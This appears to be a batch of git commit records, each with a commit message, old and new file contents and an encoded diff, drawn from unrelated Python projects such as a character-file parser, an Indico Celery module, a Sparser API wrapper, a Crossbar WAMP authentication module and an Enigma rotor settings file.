instantiated with an external library%0A path: (string) path to file or directory used to instantiate source_object%0A source_id: (string) unique ID value for this object%0A %22%22%22 %0A @@ -2225,32 +2225,84 @@ rce_path(self):%0A + %22%22%22Returns source path attribute string.%22%22%22%0A return s @@ -2341,32 +2341,113 @@ glyphobj(self):%0A + %22%22%22Generator that yields ordered external library glyph-level objects%22%22%22%0A raise No @@ -2584,32 +2584,58 @@ Source(Source):%0A + %22%22%22See base class.%22%22%22%0A def __init__ @@ -2864,16 +2864,16 @@ glyph%0A%0A%0A - class UF @@ -2885,24 +2885,50 @@ ce(Source):%0A + %22%22%22See base class.%22%22%22%0A def __in
decbdb176121830dbaffe5db0596b0567be57a76
Make char parser public and document module better
npc/parser.py
npc/parser.py
""" Parse character files into Character objects """ import re import itertools from os import path, walk from .util import Character def get_characters(search_paths=None, ignore_paths=None): """ Get data from character files Normalizes the ignore paths with os.path.normpath. Args: search_paths (list): Paths to search for character files ignore_paths (list): Paths to exclude from the search Returns: List of Characters containing parsed character information """ if search_paths is None: search_paths = ['.'] if ignore_paths: ignore_paths[:] = [path.normpath(d) for d in ignore_paths] return itertools.chain.from_iterable((_parse_path(path, ignore_paths) for path in search_paths)) def _parse_path(start_path, ignore_paths=None, include_bare=False): """ Parse all the character files under a directory Args: start_path (str): Path to search ignore_paths (list): Paths to exclude. Assumed to be normalized, as from os.path.normpath. include_bare (bool): Whether to attempt to parse files without an extension in addition to .nwod files. Returns: List of Characters containing parsed character data """ if path.isfile(start_path): return [_parse_character(start_path)] if ignore_paths is None: ignore_paths = [] characters = [] for dirpath, _, files in _walk_ignore(start_path, ignore_paths): for name in files: target_path = path.join(dirpath, name) if target_path in ignore_paths: # skip ignored files continue _, ext = path.splitext(name) if ext == '.nwod' or (include_bare and not ext): data = _parse_character(target_path) characters.append(data) return characters def _walk_ignore(root, ignore): """ Recursively traverse a directory tree while ignoring certain paths. Args: root (str): Directory to start at ignore (list): Paths to skip over Yields: A tuple (path, [dirs], [files]) as from `os.walk`. """ def should_search(base, check): """ Determine whether a path should be searched Only skips this path if it, or its parent, is explicitly in the `ignore` list. Args: base (str): Parent path check (str): The path to check Returns: True if d should be searched, false if it should be ignored """ return base not in ignore \ and path.join(base, check) not in ignore for dirpath, dirnames, filenames in walk(root, followlinks=True): dirnames[:] = [d for d in dirnames if should_search(dirpath, d)] yield dirpath, dirnames, filenames def _parse_character(char_file_path: str) -> Character: """ Parse a single character file Args: char_file_path (str): Path to the character file to parse Returns: Character object. Most keys store a list of values from the character. The `description` key stores a simple string, and the `rank` key stores a dict of list entries. Those keys are individual group names. """ name_re = re.compile(r'(?P<name>[\w]+\.?(?:\s[\w.]+)*)(?: - )?.*') section_re = re.compile(r'^--.+--\s*$') tag_re = re.compile(r'^@(?P<tag>\w+)\s+(?P<value>.*)$') # Group-like tags. These all accept an accompanying `rank` tag. group_tags = ['group', 'court', 'motley'] # derive character name from basename basename = path.basename(char_file_path) match = name_re.match(path.splitext(basename)[0]) # instantiate new character parsed_char = Character(name=[match.group('name')]) with open(char_file_path, 'r') as char_file: last_group = '' previous_line_empty = False for line in char_file: # stop processing once we see game stats if section_re.match(line): break match = tag_re.match(line) if match: tag = match.group('tag') value = match.group('value') if tag == 'changeling': # grab attributes from compound tag bits = value.split(maxsplit=1) parsed_char.append('type', 'Changeling') if len(bits): parsed_char.append('seeming', bits[0]) if len(bits) > 1: parsed_char.append('kith', bits[1]) continue if tag == 'realname': # replace the first name parsed_char['name'][0] = value continue if tag in group_tags: last_group = value if tag == 'rank': if last_group: parsed_char.append_rank(last_group, value) continue else: if line == "\n": if not previous_line_empty: previous_line_empty = True else: continue else: previous_line_empty = False parsed_char.append('description', line) continue parsed_char.append(tag, value) parsed_char['description'] = parsed_char['description'].strip() parsed_char['path'] = char_file_path return parsed_char
Python
0
@@ -41,16 +41,146 @@ objects +%0A%0AThe main entry point is get_characters, which creates a list of characters. To%0Aparse a single file, use parse_character instead. %0A%22%22%22%0A%0Aim @@ -594,33 +594,46 @@ racters -containing +generated from every parse -d +able charact @@ -639,19 +639,80 @@ ter -information +file within%0A every path of search_paths, but not in ignore_paths. %0A @@ -1426,25 +1426,38 @@ ers -containing +generated from every parse -d +able cha @@ -1463,20 +1463,72 @@ aracter -data +file within%0A start_path, but not in ignore_paths. %0A %22%22%22 @@ -1576,17 +1576,16 @@ return %5B -_ parse_ch @@ -2059,17 +2059,16 @@ data = -_ parse_ch @@ -3107,25 +3107,24 @@ enames%0A%0Adef -_ parse_charac
0e913b3fc20e69a6ff77bafcc144e00175f8ed83
Put new classes to submodule level import
indra/assemblers/english/__init__.py
indra/assemblers/english/__init__.py
from .assembler import EnglishAssembler
Python
0.000001
@@ -32,9 +32,48 @@ ssembler +, AgentWithCoordinates, SentenceBuilder %0A
6566ef14ff19640c238ba935ff21643d554b4654
Fix breakage when celery is running
indico/core/celery/__init__.py
indico/core/celery/__init__.py
# This file is part of Indico. # Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN). # # Indico is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # Indico is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Indico; if not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from datetime import timedelta from celery.schedules import crontab from celery.signals import beat_init, import_modules from flask import session import indico from indico.core import signals from indico.core.celery.core import IndicoCelery from indico.core.config import config from indico.core.db import db from indico.core.settings import SettingsProxy from indico.core.settings.converters import DatetimeConverter from indico.util.date_time import now_utc from indico.util.i18n import _ from indico.web.flask.templating import template_hook from indico.web.flask.util import url_for from indico.web.menu import SideMenuItem __all__ = ('celery',) #: The Celery instance for all Indico tasks celery = IndicoCelery('indico') celery_settings = SettingsProxy('celery', { 'last_ping': None, 'last_ping_version': None }, converters={ 'last_ping': DatetimeConverter }) @signals.app_created.connect def _load_default_modules(app, **kwargs): celery.loader.import_default_modules() # load all tasks @import_modules.connect def _import_modules(*args, **kwargs): import indico.core.emails import indico.util.tasks signals.import_tasks.send() @beat_init.connect def _send_initial_heartbeat(*args, **kwargs): heartbeat.delay(initial=True) @signals.menu.items.connect_via('admin-sidemenu') def _extend_admin_menu(sender, **kwargs): if session.user.is_admin: return SideMenuItem('celery', _("Tasks"), url_for('celery.index'), 20, icon='time') @template_hook('global-announcement', priority=-100, markup=False) def _inject_announcement_header(**kwargs): if not session.user or not session.user.is_admin or config.DISABLE_CELERY_CHECK: return last_ping = celery_settings.get('last_ping') last_ping_version = celery_settings.get('last_ping_version') down = not last_ping or (now_utc() - last_ping) > timedelta(hours=1) mismatch = last_ping_version and last_ping_version != indico.__version__ if down: text = _("The Celery task scheduler does not seem to be running. This means that email sending and periodic " "tasks such as event reminders do not work.") elif mismatch: text = _("The Celery task scheduler is running a different Indico version.") return ('warning', text, True) @celery.periodic_task(name='heartbeat', run_every=crontab(minute='*/30')) def heartbeat(initial=False): celery_settings.set('last_ping', now_utc()) if initial: celery_settings.set('last_ping_version', indico.__version__) db.session.commit()
Python
0.000172
@@ -3036,16 +3036,40 @@ +else:%0A return%0A return -( 'war @@ -3081,25 +3081,24 @@ , text, True -) %0A%0A%[email protected]
a8e3a0b7896403d5d9de9edf147693befc90493d
Use SSL.
securelayer/views.py
securelayer/views.py
# -*- coding: utf-8 -*- # (c) 2010-2011 Ruslan Popov <[email protected]> from django.conf import settings from django import forms from django.http import Http404 from django.utils import simplejson from django.utils.translation import ugettext_lazy as _ from django.shortcuts import redirect from securelayer.http import Http import gnupg class NextStep(forms.Form): """ This form is used to redirect a client to SecureLayer site.""" data = forms.CharField(widget=forms.HiddenInput) def sign_this(data): """ Converts the data into GPG signed JSON. """ jsonified = simplejson.dumps(data) gpg = gnupg.GPG(gnupghome=settings.GPG_HOMEDIR) signed = gpg.sign(jsonified, passphrase=settings.GPG_PASSPHRASE) return signed.data.decode('utf-8') def secured_request(url, params={}, session_key=None): """ Realizes data transfer through SSL. Sends params to URL. Uses Cookies.""" http = Http(settings.SECURELAYER_HOST, settings.SECURELAYER_PORT) if session_key: http.session_id = session_key if http.request(url, 'POST', {'data': sign_this(params)}): response = http.parse() if response.get('status', None) == 200: return (True, response, http.session_id) else: response = { 'status': 598, 'desc': _('Request error.') } return (False, response, None) def use_secured_form(request, form, context, caption, desc): """ Processes client's data through SecureLayer site.""" if request.method == 'GET': session_key = request.GET.get('ss', None) if session_key: ready, response, cookie = secured_request( '/api/', {'service': 'data'}, session_key) form.import_json(response.get('data', None)) return form else: context.update( { 'action': 'http://%s:%s/show/' % ( settings.SECURELAYER_HOST, settings.SECURELAYER_PORT), 'button_list': [{'title': _(u'Redirect'), 'name': 'redirect', 'type': 'submit'},], 'body': _(u'You will be redirected on SecureLayer ' 'for secure data entering.')} ) params = { 'return_to': request.build_absolute_uri(), 'form': form.as_json(caption=caption, desc=desc) } return NextStep(initial={'data': sign_this(params)}) else: # пост придти в эту форму не может raise Http404 def form(local_form, caption=None, desc=None): """ SecureLayer's Decorator. """ def renderer(view): def wrapper(request, *args, **kwargs): context = { 'action': '.', 'body': _(u'The data would be transferred by open channel.'), } check = ready, status, session_key = \ secured_request('/api/', {'service': 'check'}) if not ready: form = local_form(request.POST or None, *args, **kwargs) else: form = use_secured_form(request, local_form(), context, caption, desc) form.request = request return view(request, form, context, check, *args, **kwargs) return wrapper return renderer
Python
0
@@ -973,16 +973,25 @@ YER_PORT +, 'https' )%0A if @@ -1848,16 +1848,17 @@ ': 'http +s ://%25s:%25s
36608c6bd0035e4a78da2cd30d9fcca2c660ec3a
Add prepare in rpc client
common/numeter/queue/client.py
common/numeter/queue/client.py
from oslo import messaging from oslo.config import cfg import logging LOG = logging.getLogger(__name__) class BaseAPIClient(messaging.RPCClient): def __init__(self, transport): target = messaging.Target(topic='default_topic') super(BaseAPIClient, self).__init__(transport, target) def ping(self, context, topic, args=None): print 'Launch ping topic=%s' % topic cctxt = self.prepare(topic=topic) #return cctxt.call(context,'ping', args=args) return cctxt.cast(context,'ping', args=args) def poller_msg(self, context, topic, args=None): LOG.info('Send message %s context %s' % (topic, context)) args['topic'] = topic return self.cast(context,'poller_msg', args=args) def get_rpc_client(hosts=[]): conf = cfg.CONF conf.transport_url = 'rabbit://' conf.rabbit_max_retries = 1 conf.rabbit_hosts = hosts transport = messaging.get_transport(conf) return BaseAPIClient(transport)
Python
0
@@ -670,29 +670,41 @@ -args%5B'topic'%5D = +cctxt = self.prepare(topic= topic +) %0A @@ -715,20 +715,21 @@ return -self +cctxt .cast(co
bead9f9051ca1ca9b1823547732e847dd86e1ea1
Add verbose
pysteps/advection/semilagrangian.py
pysteps/advection/semilagrangian.py
"""Implementation of the semi-Lagrangian method of Germann et al (2002). """ import numpy as np import scipy.ndimage.interpolation as ip def extrapolate(R, V, num_timesteps, outval=np.nan, **kwargs): """Apply semi-Lagrangian extrapolation to a two-dimensional precipitation field. Parameters ---------- R : array-like Array of shape (m,n) containing the input precipitation field. V : array-like Array of shape (2,m,n) containing the x- and y-components of the m*n advection field. num_timesteps : int Number of time steps to extrapolate. outval : float Optional argument for specifying the value for pixels advected from outside the domain. If outval is set to 'min', the value is taken as the minimum value of R. Default : np.nan Optional kwargs: --------------- D_prev : array-like Optional initial displacement vector field of shape (2,m,n) for the extrapolation. Default : None n_iter : int Number of inner iterations in the semi-Lagrangian scheme. Default : 3 inverse : bool If True, the extrapolation trajectory is computed backward along the flow (default), forward otherwise. Default : True return_displacement : bool If True, return the total advection velocity (displacement) between the initial input field and the advected one integrated along the trajectory. Default : False Returns ------- out : array or tuple If return_displacement=False, return a time series extrapolated fields of shape (num_timesteps,m,n). Otherwise, return a tuple containing the extrapolated fields and the total displacement along the advection trajectory. """ if len(R.shape) != 2: raise ValueError("R must be a two-dimensional array") if len(V.shape) != 3: raise ValueError("V must be a three-dimensional array") # defaults D_prev = kwargs.get("D_prev", None) n_iter = kwargs.get("n_iter", 3) inverse = kwargs.get("inverse", True) return_displacement = kwargs.get("return_displacement", False) if outval == "min": outval = np.nanmin(R) coeff = 1.0 if not inverse else -1.0 X,Y = np.meshgrid(np.arange(V.shape[2]), np.arange(V.shape[1])) XY = np.stack([X, Y]) R_e = [] if D_prev is None: D = np.zeros((2, V.shape[1], V.shape[2])) else: D = D_prev.copy() for t in range(num_timesteps): V_inc = np.zeros(D.shape) for k in range(n_iter): if t > 0 or k > 0 or D_prev is not None: XYW = XY + D - V_inc / 2.0 XYW = [XYW[1, :, :], XYW[0, :, :]] VWX = ip.map_coordinates(V[0, :, :], XYW, mode="nearest", order=0, prefilter=False) VWY = ip.map_coordinates(V[1, :, :], XYW, mode="nearest", order=0, prefilter=False) else: VWX = V[0, :, :] VWY = V[1, :, :] V_inc[0, :, :] = VWX / n_iter V_inc[1, :, :] = VWY / n_iter D += coeff * V_inc XYW = XY + D XYW = [XYW[1, :, :], XYW[0, :, :]] IW = ip.map_coordinates(R, XYW, mode="constant", cval=outval, order=0, prefilter=False) R_e.append(np.reshape(IW, R.shape)) if not return_displacement: return np.stack(R_e) else: return np.stack(R_e), D
Python
0.999999
@@ -130,16 +130,28 @@ on as ip +%0Aimport time %0A%0Adef ex @@ -2031,16 +2031,71 @@ efaults%0A + verbose = kwargs.get(%22verbose%22, False)%0A D_pr @@ -2311,24 +2311,144 @@ False)%0A %0A + if verbose:%0A print(%22Computing the advection with the semi-lagrangian scheme.%22)%0A t0 = time.time()%0A %0A if outva @@ -3781,16 +3781,98 @@ shape))%0A + %0A if verbose:%0A print(%22--- %25s seconds ---%22 %25 (time.time() - t0))%0A %0A
34a811429e2025f396f8997aeb628253487537fb
Change Sparser call pattern along with actual exec
indra/sources/sparser/sparser_api.py
indra/sources/sparser/sparser_api.py
from __future__ import absolute_import, print_function, unicode_literals from builtins import dict, str import os import logging import subprocess import xml.etree.ElementTree as ET from indra.util import UnicodeXMLTreeBuilder as UTB from .processor import SparserProcessor logger = logging.getLogger('sparser') sparser_path_var = 'SPARSERPATH' sparser_path = os.environ.get(sparser_path_var) def process_xml(xml_str): try: tree = ET.XML(xml_str, parser=UTB()) except ET.ParseError as e: logger.error('Could not parse XML string') logger.error(e) return None sp = _process_elementtree(tree) return sp def process_nxml(fname, output_format='json'): if not sparser_path or not os.path.exists(sparser_path): logger.error('Sparser executable not set in %s' % sparser_path_var) return None if output_format == 'xml': format_flag = '-x' suffix = '.xml' elif output_format == 'json': format_flag = '-j' suffix = '.json' else: logger.error('Unknown output format: %s' % output_format) subprocess.call([sparser_path, format_flag, fname]) output_fname = fname.split('.')[0] + '-semantics' + suffix with open(output_fname, 'rb') as fh: json_dict = json.load(fh) return process_json_dict(json_dict) def process_json_dict(json_dict): sp = SparserJSONProcessor(json_dict) sp.get_statements() return sp def _process_elementtree(tree): sp = SparserXMLProcessor(tree) sp.get_modifications() sp.get_activations() return sp
Python
0
@@ -107,16 +107,28 @@ port os%0A +import json%0A import l @@ -269,16 +269,41 @@ Sparser +XMLProcessor, SparserJSON Processo @@ -1131,16 +1131,88 @@ format)%0A + sparser_exec_path = os.path.join(sparser_path, 'save-semantics.sh')%0A subp @@ -1228,24 +1228,29 @@ ll(%5Bsparser_ +exec_ path, format @@ -1358,17 +1358,17 @@ name, 'r -b +t ') as fh
9271eea8191a5be0fd74d9b3be72acf1f3d6a213
Store challenge, signature as str/unicode for JSON serialization
crossbar/router/auth.py
crossbar/router/auth.py
##################################################################################### # # Copyright (C) Tavendo GmbH # # Unless a separate license agreement exists between you and Tavendo GmbH (e.g. you # have purchased a commercial license), the license terms below apply. # # Should you enter into a separate license agreement after having received a copy of # this software, then the terms of such license agreement replace the terms below at # the time at which such license agreement becomes effective. # # In case a separate license agreement ends, and such agreement ends without being # replaced by another separate license agreement, the license terms below apply # from the time at which said agreement ends. # # LICENSE TERMS # # This program is free software: you can redistribute it and/or modify it under the # terms of the GNU Affero General Public License, version 3, as published by the # Free Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # See the GNU Affero General Public License Version 3 for more details. # # You should have received a copy of the GNU Affero General Public license along # with this program. If not, see <http://www.gnu.org/licenses/agpl-3.0.en.html>. # ##################################################################################### from __future__ import absolute_import import json from autobahn import util from autobahn.wamp import auth __all__ = ( 'PendingAuth', 'PendingAuthPersona', 'PendingAuthWampCra', 'PendingAuthTicket' ) class PendingAuth: """ Base class for pending WAMP authentications. """ class PendingAuthPersona(PendingAuth): """ Pending Mozilla Persona authentication. """ def __init__(self, provider, audience, role=None): self.authmethod = u"mozilla_persona" self.provider = provider self.audience = audience self.role = role class PendingAuthWampCra(PendingAuth): """ Pending WAMP-CRA authentication. """ def __init__(self, session, authid, authrole, authprovider, secret): """ :param session: The WAMP session ID of the session being authenticated. :type session: int :param authid: The authentication ID of the authenticating principal. :type authid: unicode :param authrole: The role under which the principal will be authenticated when the authentication succeeds. :type authrole: unicode :param authprovider: Optional authentication provider. :type authprovider: unicode or None :param secret: The secret of the principal being authenticated. Either a password or a salted password. :type secret: str """ self.session = session self.authmethod = u"wampcra" self.authid = authid self.authrole = authrole self.authprovider = authprovider challenge_obj = { 'authid': self.authid, 'authrole': self.authrole, 'authmethod': u'wampcra', 'authprovider': self.authprovider, 'session': self.session, 'nonce': util.newid(), 'timestamp': util.utcnow() } # challenge must be bytes self.challenge = json.dumps(challenge_obj, ensure_ascii=False).encode('utf8') self.signature = auth.compute_wcs(secret, self.challenge) class PendingAuthTicket(PendingAuth): """ Pending Ticket-based authentication. """ def __init__(self, realm, authid, authrole, authprovider, ticket): """ :param authid: The authentication ID of the authenticating principal. :type authid: unicode :param authrole: The role under which the principal will be authenticated when the authentication succeeds. :type authrole: unicode :param authprovider: Optional authentication provider (URI of procedure to call). :type authprovider: unicode or None :param ticket: The secret/ticket the authenticating principal will need to provide (or `None` when using dynamic authenticator). :type ticket: bytes or None """ self.authmethod = u"ticket" self.realm = realm self.authid = authid self.authrole = authrole self.authprovider = authprovider self.ticket = ticket
Python
0
@@ -3361,42 +3361,8 @@ %7D%0A%0A - # challenge must be bytes%0A @@ -3431,23 +3431,8 @@ lse) -.encode('utf8') %0A @@ -3492,16 +3492,47 @@ hallenge +.encode('utf8')).decode('ascii' )%0A%0A%0Aclas
a9365aa4a32fbe358a6f74b5730a7a3a0a8b3cda
Convert journal to pickled extra
qualia/journal.py
qualia/journal.py
import datetime import sqlite3 class Journal: def __init__(self, filename): self.db = sqlite3.connect( filename, detect_types = sqlite3.PARSE_DECLTYPES ) self.upgrade_if_needed() self.f = open(filename, 'ab') def upgrade_if_needed(self): version = self.db.execute('PRAGMA user_version').fetchone()[0] if version < 1: self.db.executescript(""" CREATE TABLE journal ( serial INTEGER PRIMARY KEY, timestamp TIMESTAMP, source TEXT, file TEXT, op TEXT, extra BLOB ); """) self.db.execute("PRAGMA user_version = 1") def append(self, source, file, op, *args, time = None): cur = self.db.cursor() cur.execute(''' INSERT INTO journal(timestamp, source, file, op, extra) VALUES(?, ?, ?, ?, ?) ''', (time or datetime.datetime.now(), source, file, op, (b'\t'.join(str(arg).encode('unicode-escape') for arg in args)))) self.db.commit()
Python
0.999999
@@ -1,22 +1,50 @@ import -datetim +base64%0Aimport datetime%0Aimport pickl e%0Aimport @@ -857,73 +857,28 @@ op, -(b'%5Ct'.join(str(arg).encode('unicode-escape') for arg in +pickle.dumps( args))) -) %0A%09%09s
ce6e67890b5860d89e9c3ea6628a7a94ad9e10b3
Update Default_Settings.py
components/Default_Settings.py
components/Default_Settings.py
#Sequences of actual rotors used in WWII, format is name, sequences, turnover notch(es) rotor_sequences = { 'I': ('EKMFLGDQVZNTOWYHXUSPAIBRCJ', ('Q')), 'II': ('AJDKSIRUXBLHWTMCQGZNPYFVOE', ('E')), 'III': ('BDFHJLCPRTXVZNYEIWGAKMUSQO', ('V')), 'IV': ('ESOVPZJAYQUIRHXLNFTGKDCMWB', ('J')), 'V': ('VZBRGITYUPSDNHLXAWMJQOFECK', ('Z')), 'VI': ('JPGVOUMFYQBENHZRDKASXLICTW', ('Z', 'M')), 'VII': ('NZJHGRCXMYSWBOUFAIVLPEKQDT', ('Z', 'M')), 'VIII': ('FKQHTLXOCBJSPDZRAMEWNIUYGV', ('Z', 'M')), 'IC': ('DMTWSILRUYQNKFEJCAZBPGXOHV', ('Q')), #civilian 'IIC': ('HQZGPJTMOBLNCIFDYAWVEUSRKX', ('Q')), #civilian 'IIIC': ('UQNTLSZFMREHDPXKIBVYGJCWOA', ('Q')), #civilian 'BETA': ('LEYJVCNIXWPBQMDRTAKZGFUHOS', None), #Position 4 Only 'GAMMA': ('FSOKANUERHMBTIYCWLQPZXVGJD', None) #Position 4 Only } #Simple letter substitutions before the sequence is sent back through the rotors. Notably a letter cannot be encoded as itself here. reflector_sequences = { 'A': 'EJMZALYXVBWFCRQUONTSPIKHGD', 'B': 'YRUHQSLDPXNGOKMIEBFZCWVJAT', 'C': 'FVPJIAOYEDRZXWGCTKUQSBNMHL', 'B Thin': 'ENKQAUYWJICOPBLMDXZVFTHRGS', 'C Thin': 'RDOBJNTKVEHMLFCWZAXGYIPSUQ', 'None': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' #Early models had no reflector } #Entry wheel for Enigma I ETW = { 'Standard': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'Navy': 'QWERTZIOPASDFGHJKLYXCVBNM' }
Python
0.000001
@@ -1368,16 +1368,17 @@ 'QWERTZ +U IOPASDFG
6ddbfbf4f4ccd0350e6066ef30967489f1e504d0
Allow for <RESIDUAL> to be present in markdown
python/MooseDocs/tree/app_syntax.py
python/MooseDocs/tree/app_syntax.py
#pylint: disable=missing-docstring #* This file is part of the MOOSE framework #* https://www.mooseframework.org #* #* All rights reserved, see COPYRIGHT for full restrictions #* https://github.com/idaholab/moose/blob/master/COPYRIGHT #* #* Licensed under LGPL 2.1, please see LICENSE for details #* https://www.gnu.org/licenses/lgpl-2.1.html #pylint: enable=missing-docstring import sys import collections import logging import json import anytree import mooseutils from MooseDocs import common from MooseDocs.tree.syntax import SyntaxNode, MooseObjectNode, ActionNode, MooseObjectActionNode LOG = logging.getLogger(__name__) REGISTER_PAIRS = [('Postprocessor', 'UserObjects/*'), ('AuxKernel', 'Bounds/*')] def app_syntax(exe, remove=None, allow_test_objects=False, hide=None, alias=None): """ Creates a tree structure representing the MooseApp syntax for the given executable. """ common.check_type('exe', exe, str) common.check_type('remove', remove, (type(None), dict, list, set)) common.check_type('hide', hide, (type(None), dict, list, set)) common.check_type('allow_test_objects', allow_test_objects, bool) try: raw = mooseutils.runExe(exe, ['--json', '--allow-test-objects']) raw = raw.split('**START JSON DATA**\n')[1] raw = raw.split('**END JSON DATA**')[0] tree = json.loads(raw, object_pairs_hook=collections.OrderedDict) except Exception as e: #pylint: disable=broad-except LOG.error("Failed to execute the MOOSE executable '%s':\n%s", exe, e.message) sys.exit(1) root = SyntaxNode('', None) for key, value in tree['blocks'].iteritems(): node = SyntaxNode(key, root) __syntax_tree_helper(node, value) hidden = set() if isinstance(hide, dict): for value in hide.itervalues(): hidden.update(value) elif isinstance(hide, (list, set)): hidden.update(hide) if hidden: for node in anytree.PreOrderIter(root): if node.fullpath in hidden: node.hidden = True # Remove removed = set() if isinstance(remove, dict): for value in remove.itervalues(): removed.update(value) elif isinstance(remove, (list, set)): removed.update(remove) if removed: for node in anytree.PreOrderIter(root): if any(n.fullpath == prefix for n in node.path for prefix in removed): node.removed = True if not allow_test_objects: for node in anytree.PreOrderIter(root): if node.groups and all([group.endswith('TestApp') for group in node.groups]): node.removed = True # Alias if alias: for node in anytree.PreOrderIter(root): for k, v in alias.iteritems(): if node.fullpath == k: node.alias = unicode(v) # Remove <RESIDUAL> for node in anytree.PreOrderIter(root): if node.name.endswith('<RESIDUAL>'): node.name = node.name[:-10] return root def __add_moose_object_helper(name, parent, item): """ Helper to handle the Postprocessor/UserObject and Bounds/AuxKernel special case. """ node = MooseObjectNode(name, parent, item) for base, parent_syntax in REGISTER_PAIRS: if ('moose_base' in item) and (item['moose_base'] == base) and \ (item['parent_syntax'] == parent_syntax): node.removed = True def __syntax_tree_helper(parent, item): """ Tree builder helper function. This investigates the JSON nodes and builds the proper input file tree for MooseDocs. """ if item is None: return if 'actions' in item: for key, action in item['actions'].iteritems(): if ('parameters' in action) and action['parameters'] and \ ('isObjectAction' in action['parameters']): MooseObjectActionNode(key, parent, action) else: ActionNode(key, parent, action) if 'star' in item: __syntax_tree_helper(parent, item['star']) if ('types' in item) and item['types']: for key, obj in item['types'].iteritems(): __add_moose_object_helper(key, parent, obj) if ('subblocks' in item) and item['subblocks']: for k, v in item['subblocks'].iteritems(): node = SyntaxNode(k, parent) __syntax_tree_helper(node, v) if ('subblock_types' in item) and item['subblock_types']: for k, v in item['subblock_types'].iteritems(): __add_moose_object_helper(k, parent, v)
Python
0.000003
@@ -2995,16 +2995,55 @@ UAL%3E'):%0A + node.alias = node.fullpath%0A
64bd44d4338d57a68ff07527d1d2c3b37960c63b
call parent filter, cleanup
web/impact/impact/v1/views/mentor_program_office_hour_list_view.py
web/impact/impact/v1/views/mentor_program_office_hour_list_view.py
# MIT License # Copyright (c) 2019 MassChallenge, Inc. from django.db.models import Value as V from django.db.models.functions import Concat from impact.v1.views.base_list_view import BaseListView from impact.v1.helpers import ( MentorProgramOfficeHourHelper, ) ID_FIELDS = ['mentor_id', 'finalist_id'] NAME_FIELDS = ['mentor_name', 'finalist_name'] class MentorProgramOfficeHourListView(BaseListView): view_name = "office_hour" helper_class = MentorProgramOfficeHourHelper def filter(self, qs): if not self.request.query_params.keys(): return qs if self._has_participant_filter(NAME_FIELDS): return self._filter_by_participant_name(qs) if self._has_participant_filter(ID_FIELDS): param_items = self.request.query_params.dict().items() return self._filter_by_participant_id(qs, param_items) def _filter_by_participant_name(self, qs): params = self.request.query_params mentor_name = params.get('mentor_name', None) finalist_name = params.get('finalist_name', None) if mentor_name: return self._generate_name_query(qs, 'mentor', mentor_name) if finalist_name: return self._generate_name_query(qs, 'finalist', finalist_name) return qs.none() def _generate_name_query(self, qs, user, name_value): first_name_field = '{}__first_name'.format(user) last_name_field = '{}__last_name'.format(user) result = qs.annotate( full_name=Concat( first_name_field, V(' '), last_name_field)).filter( full_name__icontains=name_value) return result def _filter_by_participant_id(self, qs, param_items): filter_values = { key: value for key, value in param_items if key in ID_FIELDS and value.isdigit()} if filter_values: return qs.filter(**filter_values) return qs.none() def _has_participant_filter(self, fields): return any( key in self.request.query_params.keys() for key in fields)
Python
0
@@ -502,32 +502,64 @@ lter(self, qs):%0A + qs = super().filter(qs)%0A if not s @@ -2080,19 +2080,21 @@ -key +field in self @@ -2126,19 +2126,21 @@ s() for -key +field in fiel
30e2ab7568dc00b9a8617c87269310691c19ed95
variable-length fields are initialized with a width of None
serial/core/_util.py
serial/core/_util.py
""" Private utility functions. """ from collections import namedtuple Field = namedtuple("Field", ("name", "pos", "dtype", "width")) def field_type(name, pos, dtype): """ Create a Field tuple. """ try: pos = slice(*pos) width = pos.stop - pos.start except TypeError: # pos is an int width = 1 return Field(name, pos, dtype, width) def strftime(time, timefmt): """ Return a datetime-like object as a formatted string. This is a replacement for datetime.strftime that handles years before 1900. Only the most basic fields are supported, and it is not locale-aware. """ datetime = [] pos = 0 while pos < len(timefmt): char = timefmt[pos] if char == strftime._esc: pos += 1 try: fmt, get = strftime._fields[timefmt[pos]] except KeyError: raise ValueError("unknown strftime field: {0:s}".format(s)) except IndexError: raise ValueError("timefmt cannot end with escape character") char = format(get(time), fmt) datetime.append(char) pos += 1 return "".join(datetime) # Iniitialize these values once instead of with every function call. strftime._esc = "%" strftime._fields = { strftime._esc: ("s", lambda time: strftime._esc), "d": ("02d", lambda time: time.day), "f": ("06d", lambda time: time.microsecond), "H": ("02d", lambda time: time.hour), "I": ("02d", lambda time: time.hour%12), "M": ("02d", lambda time: time.minute), "m": ("02d", lambda time: time.month), "p": ("s", lambda time: "AM" if t.hour < 12 else "PM"), # no locale "S": ("02d", lambda time: time.second), "Y": ("04d", lambda time: time.year), "y": ("02d", lambda time: time.year%100)}
Python
0.998252
@@ -242,16 +242,100 @@ e(*pos)%0A + except TypeError: # pos is an int%0A width = 1%0A else:%0A try:%0A @@ -363,24 +363,28 @@ s.start%0A + + except TypeE @@ -388,38 +388,119 @@ peError: # -pos is an int%0A +stop is None%0A # Variable-width field; width is determined during encode/decode.%0A widt @@ -499,25 +499,28 @@ width = -1 +None %0A return
d50b47cfe7df1a0c526189521b39625466615fcc
Add log indexes
radar/radar/models/logs.py
radar/radar/models/logs.py
